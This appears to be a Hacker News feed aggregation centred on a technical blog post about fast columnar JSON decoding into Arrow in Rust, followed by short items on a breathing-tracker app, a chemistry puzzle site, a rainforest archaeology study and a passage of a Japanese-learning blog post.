    https://www.hyperdx.io/blog/logs-matter-more-than-metrics hacker-news-small-sites-43199096 Thu, 27 Feb 2025 22:11:47 GMT
    <![CDATA[Fast columnar JSON decoding with arrow-rs]]> thread link) | @hkmaxpro
    February 27, 2025 | https://www.arroyo.dev/blog/fast-arrow-json-decoding | archive.org

    My day job is working on the Arroyo stream processing engine, which executes complex, stateful queries over high-scale streams of events. Computing things like windowed aggregates, stream joins, and incrementally-computed SQL involves, as you might imagine, a lot of sophisticated algorithms and systems. Doing it much faster than existing systems like Apache Flink took careful performance engineering at every level of the stack.

    But…I'm going to let you in on a little secret. The sad truth of this industry, which no one will tell you, is that so, so many data pipelines spend the bulk of their CPU time…deserializing JSON1.

    That's right. Everybody's favorite human-readable and sorta-human-writable data interchange format has been responsible for >50% of CPU usage on several high-scale Flink pipelines I've worked on. And so if you want to build a fast stream processing engine, you need to start with a fast JSON deserialization strategy2.

    Arroyo's internal data representation is built on top of Arrow, a columnar in-memory format designed for fast analytical processing3. So our challenge is to take row-oriented JSON; parse it, and build out columns from the corresponding field in each document. And do this as fast as possible.

    Fortunately, we don't have to start from scratch: the arrow-rs project includes a very fast JSON decoder, largely written by Raphael Taylor-Davies. I found the approach quite interesting and thought it was worth writing up. So we'll dig into how arrow-json works and then talk through Arroyo's extensions to support raw JSON—leaving parts of the JSON serialized—and the ability to skip records in a batch that don't match the schema. Along the way you should pick up some intuition for how to work with columnar data, which many engineers find challenging and unfamiliar in our typically row-oriented world.

    Table of contents

    But is this fast?

    Before we get into the details, we might want to answer the question…is this actually fast? And the answer is: yes! Benchmarking against the Jackson-based deserializer used for Flink SQL, arrow-json is up to 2.3x faster:

    BenchmarkJava (µs/record)Rust (µs/record)Speedup
    Nexmark0.5780.586-0.14%
    Bids0.5170.39630.6%
    Logs0.6090.50420.8%
    Tweets11.7305.108229%

    (See https://github.com/ArroyoSystems/json-benchmarks for the benchmark source code and test documents.)

    Arrow-json does particularly well with large, deeply nested records, and poorly with enum-like structures where there are many null fields.

    Batched decoding

    Arrow, like other columnar formats, operates in batches. We're almost never dealing with just one record (or “row”) of data, because columnar formats achieve their high performance by storing many values together in a single array. If you just have one row, the columnar overhead eats any performance gains.

    So our goal is to take a bunch of JSON documents (generally with a top-level object) and turn them into a set of arrays representing each column of the schema.

    To make this concrete, let's take data representing HTTP server logs:

    Field NameData Type
    ipUtf8
    identityUtf8
    user_idUtf8
    timestampTimestamp
    dateUtf8
    requestUtf8
    codeUInt32
    sizeUInt64

    An example document looks like this:

    {
      "ip": "131.62.139.111",
      "identity": "-",
      "user_id": "jimmy_voluptas",
      "timestamp": "2025-02-19T09:15:21.884163-08:00",
      "request": "POST /tmp/high/own.zip",
      "status_code": 404,
      "size": 4980,
      "referer": "-",
      "user_agent": "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
    }

    And we'll be decoding each column into arrays like this:

    ip137.100.60.1653.249.253.103118.64.108.216113.243.167.149133.131.152.130121.87.92.182
    identity------
    user_iddeven_quikiara_nihileladio_cupiditalucile_temporarae_etenrico_dolorum
    timestamp2025-02-19T09:15:22.281400-08:002025-02-19T09:15:22.303590-08:002025-02-19T09:15:22.325585-08:002025-02-19T09:15:22.347106-08:002025-02-19T09:15:22.369079-08:002025-02-19T09:15:22.391311-08:00
    requestGET /sbin.tarGET /var/problem/first.zipGET /part/public.pptGET /etc/harper/man/few.xlsGET /usr/aria/elijah/man.rarGET /var/week/life.xls
    status_code401500403200500403
    size95126965910928864592706
    referer------

    In general, operations are much more efficient if we can perform them along the grain of columns; in other words we want to decode all of the ips, then all of the identities, then all of the user_ids, as this allows us to avoid repeatedly downcasting (interpreting as a concrete type) our generically-typed arrays.

    Stealing from the best

    To do so, arrow-json uses an idea from simdjson, one of the fastest JSON decoders out there4. While most JSON libraries parse (understanding the structure of the document) and deserialize (converting to a tree representation) as a single step, simdjson uses two passes. In the first pass, it identifies all of the structural tokens ([, {, ], } ,:, ,) and stores their locations to a separate array5. In the second pass each previously-identified node is parsed into the tree. For simdjson this strategy enables SIMD (single-instruction multiple data) processing to quickly identify the token locations, then allows parallelizing the tree constructions because fields can be handled without needing to finish previous fields.

    It turns out this structure is quite helpful when doing columnar parsing as well, as we can use the output of the first pass to deserialize entire columns at once, as we start knowing where all of the fields corresponding to that column are in the buffer.

    We do need to make some changes to the simdjson approach to support efficiently operating over many JSON documents. The arrow-json interface looks like this:

    impl Decoder {
        pub fn decode(&mut self, buf: &[u8]) -> Result<usize, ArrowError>;
     
        pub fn flush(&mut self) -> Result<Option<RecordBatch>, ArrowError>;
    }

    This is a function on the Decoder struct (which stores the state of the in-progress batch) which takes a byte slice—an immutable view of a sequence of bytes—then returns either the number of processed bytes or an error if the JSON was malformed.

    The API supports streaming. We can just keep piping in bytes representing potentially partial JSON documents without having to frame them (figure out where one ends and the next begins). When we're ready to consume the outputs, we call flush which returns an Arrow RecordBatch (a series of columns with a schema) with all of the data we'd sent to decode.

    As we're just given slices (which are references to data we don't own) and we're deferring the actual deserialization to the flush call, we need to store the underlying data ourselves in order to reference it in the second pass.

    Run the tape

    With that background, we can describe the arrow-json deserialization algorithm. We'll start with the first pass, where we parse the JSON into a flattened “tape” data structure, containing an array of structural components. While we process bytes, we're building up three data structures

    • tape: Vec<TapeElement>, a list of structural elements in the data, like {, } , [, as well as strings, numbers, and literals etc. Structural elements store an int identifying their opposite element (so a { points to the index of the corresponding }), while strings and numbers are stored as indices into the offsets array
    • bytes: Vec<u8>, a buffer containing raw string data and numeric literals (as we don't have access to the original inputs when it comes time to building the RecordBatch, we have to store the raw data ourselves)
    • offsets: Vec<usize>, a list of offsets into the bytes buffer, pointing to where individual elements begin (and, by looking at the next offset, where they end).

    We also keep a stack of our parse state, as in typical recursive-descent parsing, and use a state machine to drive the parsing process.

    To start decoding, we push a Value token onto the parse stack, which indicates we're looking for a valid JSON Value—one of a null, true, or false literal, a string, a number, an array, or an object; these are all distinguishable by looking at a single character. Whichever we find, the corresponding state is pushed onto the stack and on the next iteration of the decode loop we will begin to decode that value.

    To help understand how this proceeds, we'll walk through a few value parsing strategies.

    Strings

    A JSON string starts with a double-quote ", then continues through any valid unicode codepoints until an unescaped closing ". It may also contain special characters and arbitrary unicode via escapes (\b, \f, \n, \r, \t, \\, \", \uXXXX). We search for the next double-quote or backslash (using a SIMD-optimized memchr function), and push those bytes onto our buffer.

    We then look at which byte we matched. If it's a backslash, we move into the escape state, decoding the escaped value and pushing it into our buffer. If it's a double quote, we're done. We push buffer.len() into the offsets list to indicate where this string ends, then a String element onto the tape, along with the second-to-last index of the offset array, which marks the start.

    Lists

    List decoding starts when we encounter a [ token. We push StartList to the tape, then we skip ahead to the next non-whitespace, non-comma token, and check if it's a ]. If so, we're done with the list. We push an EndList to the tape, and update the corresponding StartList to point to the index of the EndList. Otherwise, we begin value parsing for the list element.

    An example

    To see how this works, we can walk through the example of decoding this log line:

    {"ip":"34.127.44.91","identity":"-","user_id":"carmela_enim",
    "timestamp":"2025-02-19T09:15:21.839430-08:00",
    "request":"GET /sbin/early.csv","status_code":401,"size":3833,"referer":"-"}

    We start, as always, in the Value state. We find the first token is a {, moving us to the Object state, causing us to push StartObject(MAX_INT) to the tape. Then we encounter the ", moving to the String state. We search for the next " or \\ , finding a". We push the bytes between the quotes (ip) to the buffer, push 2 onto the offsets array, and String(0) to the tape.

    From there we continue through the various parse rules until we reach the }; we push EndObject(1) and update the initial StartObject from the placeholder MAX_INT to point to the end index (18).

    When fully parsed, we end up with the following datastructures:

    A worked-through example showing the tape datastructure

    Column building

    Once we have the tape built we can perform the second pass, which builds the final columns of Arrow arrays.

    We start by constructing a tree of decoders according to our schema. Each decoder is responsible for implementing a decode function:

    fn decode(&mut self, tape: &Tape<'_>, pos: &[u32])
       -> Result<ArrayData, ArrowError>

    (if you're not familiar with Rust definitions, this is a method, taking a mutable reference to the struct—self in Rust terms, equivalent to Java's this—an immutable reference to the tape datastructure we built previously, and an immutable slice of an array of ints, and returning either an error or ArrayData).

    This might look a bit funny—why are we getting an array of positions? This is where the the columnar part of this comes in, and much of the performance justification for the process of building up the tape before deserializing. Because we've identified all of the components of the document and we know the schema, we can determine up-front the tape indices of all of the data that will go into a particular array—meaning we can process them all at once, in a tight, efficient loop, and only needing to downcast the array a single time.

    What does this look like? In our example, the top-level decoder is a StructArrayDecoder, containing as fields all of the fields of our top-level object:

    StructArrayDecoer {
      decoders: [
        StringArrayDecoder { .. }, // ip
        StringArrayDecoder { .. }, // identity
        StringArrayDecoder { .. }, // user_id
        TimestampArrayDecoder { .. }, // timestamp
        StringArrayDecoder { .. }, // request
        PrimitiveArrayDecoder { .. } // status_code
        PrimitiveArraydecoder { .. } // size
        StringArrayDecoder { .. } // referer
      ]
    }

    Struct decoding

    Decoding starts by finding all of the tape positions of our top level value. If this is a primitive value, like a string or a number, this is trivial—every element in our tape will be our primitive.

    In the more common case that this is a struct, we make use of the metadata we stored along with the StartObject tape element—the tape position of the corresponding EndObject element. So to find all of the StartObjects, we can use this simple algorithm:

    let mut cur_idx = 1; // The first offset is a null
    let mut pos = vec![];
     
    for _ in 0..tape.num_rows() {
        offsets.push(cur_idx);
     
        match tape.elements[cur_idx] {
            TapeElement::StartObject(end_idx) => {
                cur_idx = end_idx + 1;
            }
            TapeElement::Null => {
                cur_idx += 1;
            }
            ..
        }
    }

    With our top-level positions found, we can call the decode method for our StructArrayDecoder, which must then find the positions array for each struct field. There are three potential complications here6:

    • Expected fields may be missing
    • Additional fields may be present
    • We might have a null literal instead of an object

    For each struct position, then, we first determine whether it's an object or Null by querying the tape. If it's Null, we just append that to a null buffer7 and continue on. If it's an object, we go field-by-field by iterating through every tape element between the object start and object end. Starting at the next element, we read it as a String (if it's not, this is not a valid JSON document—since Object keys must be strings—and we can exit).

    We look up the key in our schema and find the corresponding field, and add the next tape element to its position array, then advance to the next field.

    Once we've found the position arrays for all our fields, we simply pass them into the decode method on each of our child decoders, producing arrays for each, which we can construct into our StructArray according to the Arrow Struct layout.

    Primitive and String decoding

    For non-nested types like primitives (nulls, ints, and floats) and strings, decoding is much simpler. We simply iterate through the positions array, looking up each element in the tape, and parsing it as the corresponding Arrow type, and pushing it into our array (which we are able to construct and size up front, since we know how many elements there will be). A bit of complexity creeps in here, as JSON typing can be a bit…loose…in practice. So if we're expecting a number and find a string, we'll attempt to parse it as a number anyways8.

    If you remember the tape encoding from earlier, there isn't much distinction between strings and numbers—they're both stored as bytes in our buffer, copied directly from the input. The tape element points to an index in our offset array, which then indexes into our buffer. So numeric decoding in either case looks like this:

    match tape.get(pos) {
        TapeElement::String(idx) => {
            let s = tape.get_string(idx);
            let value = P::parse(s).ok_or_else(|| {
                ArrowError::JsonError(format!("failed to parse \"{s}\" as {d}",))
            })?;
     
            builder.append_value(value)
        }
        TapeElement::Number(idx) => {
            let s = tape.get_string(idx);
            let value = ParseJsonNumber::parse(s.as_bytes()).ok_or_else(|| {
                ArrowError::JsonError(format!("failed to parse {s} as {d}",))
            })?;
     
            builder.append_value(value)
        }
        ...
    }

    with Tape::get_string implemented something like

    fn get_string(&self, idx: u32) -> &str {
        self.buffer[self.offsets[idx]..self.offsets[idx + 1]
    }

    Once we've parsed each of our positions, we build and return the final array.

    Streaming extensions

    So that's how the standard arrow-json decoder works. We parse the input text into a flattened tape data structure, find the positions of each row, then build up each Arrow array in one go.

    But for Arroyo, we found we needed a couple of additional features to support streaming data ingestion, as event data is often messier than properly schematized and cleaned batch data.

    Raw JSON

    Decoding JSON into Arrow can provide some impedance mismatch: JSON is, by itself, untyped, unschematized, and pretty much an anything goes sort of data serialization format. Attempts to add structure to JSON—like JSON Schema—end up with incredible complexity, with features like conditionals, pattern properties, and self-modifying schemas. We're never going to be able to support all of that in a relatively rigid typesystem like Arrow. In other cases, the data fundamentally does not follow a schema, like an unstructured “properties” field.

    So sometimes you just need an escape hatch, the ability to throw up your hands and say, sure, just give us whatever you got. In Arroyo, we call that raw JSON—a special Arrow extension type that will accept any valid JSON value and store it as an encoded string.

    How do we efficiently decode arbitrary JSON into a string? The tape decoding approach actually makes this quite simple. In each case, we are building up a string. We have a few cases to handle depending on what kind of TapeElement we find:

    • Literals (true/false/null): we write that literal to the string
    • Strings: we push ", followed by the contents of the buffer corresponding to the string, followed by "
    • Numbers: we push the contents of the buffer corresponding to that number
    • Lists: we push [, then go element by element, recursively calling our decode method, pushing , (except for the last one), then ]
    • Objects: we first push {, go two elements at a time, first decoding the key, pushing :, then the value pushing , (except for the last one), then }

    Once we've reached the end of the element we end up with a compact representation of the original JSON (notably missing the original whitespace, which is lost during the tape building process).

    Invalid data handling

    A reality of JSON data pipelines is that the JSON in them is not always exactly as it's supposed to be. Some application adds a field, emits a new type of event, or drops a required field and now there's bad data in our Kafka topic. So Arroyo, like other streaming engines, offers a “bad data” handling setting, that allows users to ignore incorrect data rather than failing the pipeline.

    For row-based decoding this is trivial to implement—you try to decode a row, and that fails you just move on. As an application, you don't need any special support from the decoder. But for columnar decoding, we process an entire batch of records at once, and a single bad document will cause us to lose the entire batch. Adding in the ability to handle fine-grained errors requires modifying the decoder itself.

    We'll consider two ways our input JSON might be invalid, corresponding to our two passes. The first is if the JSON fails to parse—for example, there's a { without a corresponding }, an unterminated string, or an illegal escape sequence. These errors we handle when passing bytes to the TapeDecoder. For example, if we start parsing an object we expect to find the next character is a "—if it's not we'll return an error.

    {
      "ip": "131.62.139.111,
      "identity": "-"
    }

    Once an error has occurred, we roll back the state of the tape to where it was when we started parsing the current record. This requires storing the indices of our three arrays when we start each new record, and unwinding the stack.

    The second type of error occurs when we receive valid JSON which mismatches the schema. How strict we are about validation is configurable (users can choose to allow extra fields, to coerce primitives, and mark fields as nullable), but there are some errors that will always fail decoding, like incorrect and un-coercable types

    {
      "ip": "131.62.139.111",
      ...
      "size": "pretty big"
    }

    The columnar decoding strategy makes handling schema errors harder. In this example, we don't know the record is bad until we get to the final column, at which point we've already built all of the other columns. We can't merely skip it at this point, because that will lead to different columns being misaligned (we could mark it null, assuming the column is nullable, but that has different and undesirable semantics).

    We really need to know which rows are invalid before we start constructing any of our columns. Our solution was to add an addition method to each decoder:

    fn validate_row(&self, tape: &Tape<'_>, pos: u32) -> bool

    This method should follow the validation logic in the actual decoder, returning true for valid rows and false for invalid ones.

    Before decoding a batch, we then call this for our root decoder with each position, determining which rows are good and which are invalid. We filter out any bad rows from our positions array, and proceed to decode with the good rows. If desired we can also return the bad JSON (possibly for logging or reporting to the user) by using the raw JSON decoder described above.

    Wrapping up

    So that is how Arroyo deserializes JSON into Arrow arrays. As discussed at the beginning, this is quite fast, but there are still many possible performance improvements. While writing this post, I spent some time profiling and optimizing the tape decoder and found 30-40% of performance improvements.

    That PR added SIMD optimizations to a couple of operations (finding string ends and UTF-8 validation), but most of the input processing work is still done in a scalar manner. There's also room to eliminate the CPU spent building the string buffer by using the input data directly as in simdjson (albeit at the cost of extra memory usage).

    The array-building pass is already quite efficient so long as our data is dense. In cases where we have many fields that are null (possibly to express an enum) we pay the cost of filling in all of those fields (and subfields, if they are objects) with null values.


    1. https://dl.acm.org/doi/10.14778/3236187.3236207

    2. Some may interject at the point that the real solution is to stop using JSON for your data pipelines. Other formats like Protobuf or Avro can be deserialized much faster, and are schematized to prevent bad data. But you try tell the 1000 developers at your company that they should spend a quarter on data format migrations.

    3. Columnar formats like Arrow store data as arrays of columns (for example, every user_id field will be stored together) rather than rows (storing the user_id, created_at, name, etc. fields for a single user together). They have many advantages for analytical processing.

    4. simdjson has a lot of other tricks up its sleeves to get its outrageous performance, as detailed in this highly-readable VLDB paper

    5. This is significantly more complex than it sounds, because structural tokens may be contained within quotes—in which case they're no longer structural—but quotes may also be escaped.

    6. If all fields are non-nullable and we're operating in “strict” mode where additional fields are not allowed, we could just compute the fixed offsets, like every field congruent to 1 mod 8 is identity

    7. Arrow uses a dedicated bitmap, the “null” or “validity” buffer, to indicate whether the corresponding element in the data buffer is null; this allows us to store, for example, primitive ints without needing to reserve a special null value.

    8. In fact, because many JSON encoders use JavaScript numeric types and lack support for full 64-bit integers, string encoding is the only reliable way to pass large numbers around

    ]]>
    https://www.arroyo.dev/blog/fast-arrow-json-decoding hacker-news-small-sites-43199060 Thu, 27 Feb 2025 22:07:30 GMT
    <![CDATA[Show HN: Get pinged when you are mouth breathing]]> thread link) | @mark_mcnally_je
    February 27, 2025 | https://mcnally.je/breath/ | archive.org

    The Ancient Ritual:

    1. Activate the Scrying Mirror with the "Commence Scrying" incantation
    2. The enchanted glass will track thy visage and detect if thy mouth betrays thee
    3. For the first 10 seconds, breathe normally through thy nose to calibrate the mirror
    4. The oracle shall provide immediate counsel on thy breathing patterns
    5. The ancient scrolls will record the percentage of time spent in improper form

    Heed this wisdom: Enable Auto-Calibration to establish thy natural breathing baseline during the first 10 seconds. The observer will automatically set an optimal threshold based on thy normal nose breathing pattern. Alternatively, manually adjust the sensitivity slider to control exactly how many pixels of lip separation are allowed (with sub-pixel accuracy).

    ]]>
    https://mcnally.je/breath/ hacker-news-small-sites-43198952 Thu, 27 Feb 2025 21:56:16 GMT
    <![CDATA[Chemdle]]> thread link) | @eden-u4
    February 27, 2025 | https://chemdle.com/chemdles | archive.org

    Curated daily organic chemistry problems!

    ]]>
    https://chemdle.com/chemdles hacker-news-small-sites-43198795 Thu, 27 Feb 2025 21:39:40 GMT
    <![CDATA[Evidence that our ancestors lived in rainforests 150k years ago]]> thread link) | @gmays
    February 27, 2025 | https://www.sheffield.ac.uk/news/scientists-find-earliest-evidence-our-ancestors-lived-rainforests-150000-years-ago | archive.org

    The earliest evidence of humans living in tropical rainforests in Africa, around 150,000 years ago, has been published in a new study in Nature by researchers at the University of Sheffield.

    • A new study published in Nature provides the earliest evidence that our human ancestors lived in the tropical rainforests of Africa
    • The study involving University of Sheffield researchers dates humans living in rainforests back to 150,000 years ago, 80,000 years earlier than found in other rainforests sites around the world
    • Luminescence and Electron Spin Resonance dating techniques were used to date sediments containing Middle Stone Age tools found at an archeological site in Côte d'Ivoire, Africa, to a time when tropical rainforests existed across the region
    • The study argues that tropical rainforests were not a barrier to the spread of modern humans and supports the theory that human evolution happened across a variety of regions and habitats.

    The earliest evidence of humans living in tropical rainforests in Africa, around 150,000 years ago, has been published in a new study in Nature.

    Humans were thought to have not lived in rainforests until relatively recently due to them being thought of as natural barriers to human habitation.

    However the new study - published by an international team led by the Max Planck Institute of Geoanthropology, with contributions from the University of Sheffield - found that humans were living in rainforests within the present-day Côte d'Ivoire around 150,000 years ago.

    The study puts the evidence for humans living in rainforests anywhere in the world, back by 80,000 years, and argues that human evolution happened across a variety of regions and habitats.

    The team re-excavated an archaeological site from the 1980s currently found within rainforest, in which stone tools had previously been found deep within sediments but could not be dated. They then applied new scientific methods to the site which were not available during the original study.

    Ancient pollen, silicified plant remains (phytoliths) and leaf wax isotopes from site sediments were also analysed and found to indicate that when humans were dropping their stone tools in the region, it was a heavily wooded wet forest, typical of humid West African rainforests.

    Professor Mark Bateman, from the University of Sheffield’s School of Geography and Planning, used a dating technique called Optically Stimulated Luminescence, to discover the burial age of individual grains of sand from eight samples throughout the site. His work showed that the archaeological site extended back from 12,000 years ago right through to around 150,000 years ago. These results were then corroborated by Electron Spin Resonance dating.

    Professor Bateman, said: “The stone tools found at the site were thought to be from the Middle Stone Age, so they could have been as old as 500,000 years, or as young as 10,000 years.

    “Key to finding when they were being used was the application of modern dating techniques to the sediments in which the stone tools were found.

    “It is incredibly interesting to take a grain of ancient sand and be the first to know when it was deposited. It is even more so when the age of the sand changes what we know of how, and where, our ancient ancestors lived.”

    Lead author of the study, Dr. Eslem Ben Arous from the National Centre for Human Evolution Research (CENIEH), said: “Before our study, the oldest secure evidence for habitation in African rainforests was around 18,000 years ago, and the oldest evidence of rainforest habitation anywhere came from southeast Asia at about 70,000 years ago.” 

    “This pushes back the oldest known evidence of humans in rainforests by more than double the previously known estimate.”

    Professor Eleanor Scerri, senior author of the study and leader of the Human Palaeosystems research group at the Max Planck Institute of Geoanthropology, said:  “Several recent climate models suggested the area could have been a rainforest refuge in the past as well, even during dry periods of forest fragmentation. So we knew the site presented the best possible chance for us to find out how far back into the past rainforest habitation extended.

    “This work reflects a complex history of population subdivision, in which different populations lived in different regions and habitat types. 

    “We now need to ask how these early human niche expansions impacted the plants and animals that shared the same niche-space with humans. In other words, how far back does human alteration of pristine natural habitats go?”

    Professor Bateman, added: “There are other sites waiting to be investigated that could provide equally as exciting results. However this study was completed just before the site was destroyed by mining activity, highlighting that being able to do work such as this is vitally important in being able to further study the history and evolution of the human species.”


    ]]>
    https://www.sheffield.ac.uk/news/scientists-find-earliest-evidence-our-ancestors-lived-rainforests-150000-years-ago hacker-news-small-sites-43198678 Thu, 27 Feb 2025 21:24:50 GMT
    <![CDATA[How I’m Learning Japanese 14 Days In]]> thread link) | @ingve
    February 27, 2025 | https://wavelengths.online/posts/how-im-learning-japanese-14-days-in | archive.org

    I’ve tried to learn Japanese a few times over the years, the earliest attempt at which was some time in high school while I was watching an episode of Fullmetal Alchemist and casually looked up how long it would take.

    I quit as soon as I’d decided to start.

    Years later I was hosting a weekly recap podcast about a Japanese reality show called Terrace House with my friend and thought “it’s silly for me to be talking about this show every week without understanding any Japanese. I need to learn.”

    ↑ Excerpt ↑

    I — an idiot — did almost no research and didn’t ask anybody for help which resulted in buying a textbook called Genki and downloading Duolingo. While Genki is widely used and recommended by many, I found that trying to dive headfirst into it with no assistance and no additional study materials was Decidedly Not the way I was going to learn Japanese and focused all of my time on Duolingo instead. My commutes to and from work each day consisted of about four total hours of train rides, which when focused on cramming as many Duolingo lessons as possible made for a pretty solid amount of study time — though I was unaware of how poor Duolingo would be as a single tool for learning Japanese. I dropped the habit eventually as work became more and more overwhelming and the idea of spending two hours shoving a new language into my skull, then working a high intensity job for eight (but usually more) hours, then spending two more hours in Duolingo on the way home was a really cool way to burn out. 

    Fast forward to two weeks ago and my partner and I had finally decided that we’d spend our honeymoon in Japan at some point this year and the desire to learn popped up again, this time with both of us learning simultaneously. It’s easier to stay committed to a habit when you have a buddy. I did a ton of research, consulted with a few friends who learned the language in a variety of ways, and tried every method and resource I could find before landing on some tools that really do the trick.

    We’ve now both been studying for about two weeks and have made significantly more progress in those two weeks than I did in the months of daily four-hour commuting study via Duolingo years ago, so I thought as a way to share some resources and hold myself accountable I’d write up a post about how to start learning when you know literally nothing. It’s worth mentioning once again: I’m only two weeks into this. My advice may change, I may find new tools and resources, and I may bail from others. If there’s enough interest, I’ll keep this up as a series or update this post over time.

    A note: Sorry to the Android users among you, but as an iOS user some of the apps I recommend will be iOS only. I’ll link to Android versions when possible or other recommended apps if I find them.

    Step One: Learn Hiragana and Katakana

    The first part of learning Japanese is both easy and difficult in equal measure. Easy because it involves a simple step, which is to learn two of the three “alphabets” used in the language which will lay the foundation for the rest of the journey and enable you to understand and utilize more advanced study materials down the line. Difficult because it really comes down to rote memorization and repetition which can be boring or difficult to motivate yourself to do.

    For context: Hiragana and katakana are two sides of the same coin, in that they each contain 46 basic characters that represent the phonetic sounds used in spoken Japanese language. Unlike English where the letter “a” can be used to make a multitude of sounds when found within a word, the hiragana and katakana “a” — あ and ア — pretty much always make the “ah” sound as found in the word “car.” Hiragana is used for most words that originate from Japanese, while katakana is used for “loan words” or words that have been adopted into Japanese but may come from other origins. For example ステーキ is pronounced “su-te-ki” which sounds an awful lot like “steak” and in fact just means “steak” because it’s an English word adapted into Japanese. Fun!

    This means all you need to do for step one is learn the characters and there are a lot of ways to do that depending on how quickly you want to get it done and how you learn best. Duolingo has a great tool for learning these, though the process was much too slow for me. On my end I used the following resources: 

    Learn Hiragana in One Hour

    I recommend watching this video in two thirty minute sessions and breaking out a pen and paper to write the characters down as the host introduces them. People with big brains agree: Writing helps memory. It can be overwhelming, but the mnemonic devices are extremely helpful for this early phase where characters look so wildly different from the English alphabet. It won’t take long for them to become second nature — the mnemonics fade away. Also: Make sure you repeat after Risa out loud to make sure you’re matching the intonation. As the hiragana are the most foundational element of the language learning process, any bad habits here could cause issues down the line. 

    A fun trick I’ve seen a lot of people shout out is tracing the characters with your finger on your other hand if you don’t have a pen and paper present. The order in which you draw each stroke of a character is important, so practicing any way you can is great — even if it’s just on your hand.

    Benkyō (iOS)

    Benkyō is one of a few apps by developer Romain Pellen designed to drill and memorize concepts from the Japanese language via flash cards using a spaced repetition system (SRS). SRS tools basically exist to introduce concepts, then reintroduce them at repeated intervals with the intention of burning them into your long term memory. A character you get right today will appear again in two or three days, while a character you frequently get wrong will appear more often. People Online™ are obsessed with SRS apps. While I found the setup process of Benkyō to be a bit cumbersome — some truly confusing menus in this thing — once I got the hang of it, I found myself crushing the entire hiragana chart within the first two days of study by quizzing myself with the Smart Quiz feature every chance I had. Let me be clear: That pace is not necessary. It’s all dependent on your personal goals here, and mine was to move past this foundational element within my first week if possible. 

    Benkyō is wonderful in that it will continue to scale up with you over time as it includes katakana, common vocabulary, and kanji — the third and most daunting written system used in Japan. Assume from here on out that I’m also using Benkyō for these things in between everything else I recommend. For the Android users among you, check out Dr. Moku.

    TokiniAndy’s Guide to Hiragana and Katakana

    This video will walk you through the katakana and the hiragana simultaneously, which is great for reinforcing what you’ve learned about hiragana while acclimating you to the katakana side of things. Thankfully because the sounds and modifiers are almost exactly the same, learning the basic set of katakana after the entire hiragana set will allow you to intuitively sus out the more complex katakana pairings and rules — it’s a nice boon for motivation whenever you can set yourself up to say “Oh! I know this already!” Just like the above video, I recommend writing and speaking along to really hammer this stuff in before moving back to Benkyō and introducing the flash cards for katakana. 

    Learning both character sets to the point where I have no trouble recognizing them took me about four days of fitting study in around podcasting and my day job and wedding planning and everything else life has to offer. That pace felt a bit breakneck to the point where I was mentally exhausted every night before bed, but worth it to jump to the next piece of the puzzle — and the one that will hypothetically take forever.

    Step Two: Draw the Rest of the Fucking Owl

    So there are about one million different ways to go from here, and because every person is different it means you’ll need to try a few different things to get going. Many people say the first step of learning Japanese is to learn how to learn Japanese, and I’d say that’s almost correct. The first step, once again, is to learn hiragana and katakana… second is learning how to learn Japanese.

    The reason things get so wild here is that people will say that you need to start learning kanji, vocab, and grammar simultaneously and it’s not not true. Learning even the most basic grammar helps make sense of sentence structure, which enables you to discern kanji and vocab words in the context of real written language. Conversely, the more kanji and vocab you learn the easier it will become to intuitively parse new grammatical rules as they’re introduced.

    While some all-in-one resources exist here, they generally cost a pretty decent chunk of cash. My first bit of advice before I get into what I’m personally using is to figure out which tools and what pace you can stick with. Take advice from 2017 daily-four-hour-Duolingo Brendon: Don’t burn out and don’t go all-in on a single resource. Building strong foundational habits here is key for long term success. I’ve only been learning Japanese in earnest for about two weeks, but I’ve been doing things like podcasting every week for years and years and the same principle applies to pretty much every long-term endeavor. This means balancing what you want to accomplish with what you need to maintain a healthy life — so rest often!! Progress is progress, and sometimes forgetting a word you thought you knew yesterday is also progress. Learning is weird! 

    Duolingo

    Surprise! I’m still using Duolingo! Look, it has its fair share of problems, but doing a Duolingo lesson or two every day is better than doing nothing and teaches a few helpful vocab words and grammar points here and there. I’ve had a few instances where my brief daily time in Duolingo actually helped me get a head start in the apps and platforms people recommend instead of Duolingo. There’s a lot of reasonable and unreasonable hate directed at Duolingo’s Japanese course these days. A lot of the prevailing negativity stems from people who tried it years ago and bounced off because it was slow, boring, and sometimes flat-out incorrect. Those early years of a sub-par lesson plan have laid the groundwork for thousands of posts writing the app off entirely sight unseen. Thankfully the Japanese course has undergone a huge overhaul in recent years, and I find myself generally enjoying it in very limited spurts.

    The biggest detractor is how little it teaches from a comprehension perspective and how brutally long it takes to move between units. Japanese is a super contextual language, meaning words and phrases will mean different things and can be shortened and elongated depending on the context of the conversation. Duolingo doesn’t really provide this outside of a “listening practice” lesson every few units. Polite forms and casual forms are mostly glossed over here, and grammar points pop up infrequently enough that you could be cruising through lessons without understanding why you’re saying the things you’re saying in the order you’re saying them. I’m not crushing four hours of lessons a day like I used to, and that’s because my time is better spent elsewhere — but that doesn’t mean Duolingo is as useless as many people online will tell you. Feel it out, but don’t rely on it.

    WaniKani via Tsurukame

    WaniKani seems to be most people’s favorite way of learning the kanji. There are something like 40,000 kanji which is horrifically daunting until you learn that most Japanese people are only taught around 2-3,000 in school for use in daily life. If you’re reading this as a native English speaker, you statistically know around 20,000-30,000 words — helpful perspective! You can learn 10% of those in another language, I believe in you.

    The closest thing to a cheat code you’ll get with kanji is that while it’s possible to brute-force memorize them the way you did with the hiragana and katakana, each kanji character is made up of smaller pieces called “radicals” which can also be learned separately. By learning the meanings of these radicals as the foundational element of your kanji journey, you’ll be able to infer the meaning of kanji over time. This is the core concept behind WaniKani, a flashcard system which teaches the radicals first before building on top of them to lead you into the 2,000 most commonly used characters and 6,000 vocabulary words over time. A friend who taught himself Japanese told me that WaniKani was the reason he “never had a problem” with kanji and I’m starting to see why. As of today I’ve been doing my WaniKani lessons and reviews daily and feel like I’m actually starting to get a handle on the learning process thanks to the way it casually layers helpful mnemonic stories atop each kanji. Just like the hiragana and katakana, you’ll see a kanji like 上 and spend the first few days reciting the mnemonic device in your head to lead you to the answer (in this case: the kanji means “above” and looks like “Joe’s toe sticking out above the ground,” so you know to pronounce it as じょう or “jo-o”), eventually you get to the point where the mnemonic identification phase disappears on a per-kanji basis.

    One note here is that the process takes an extremely long time as the service doles out lessons and reviews over the course of a year+ with no way to speed the process up. Every single day you’ll only be given a handful of new characters and quizzes, and while it might feel like the pace is too slow at the beginning I can already see the brilliance in how they teach their users based on the words and kanji I’ve already learned. I can tell I have a strong foundation for long-term learning based on the progress I’ve already made.

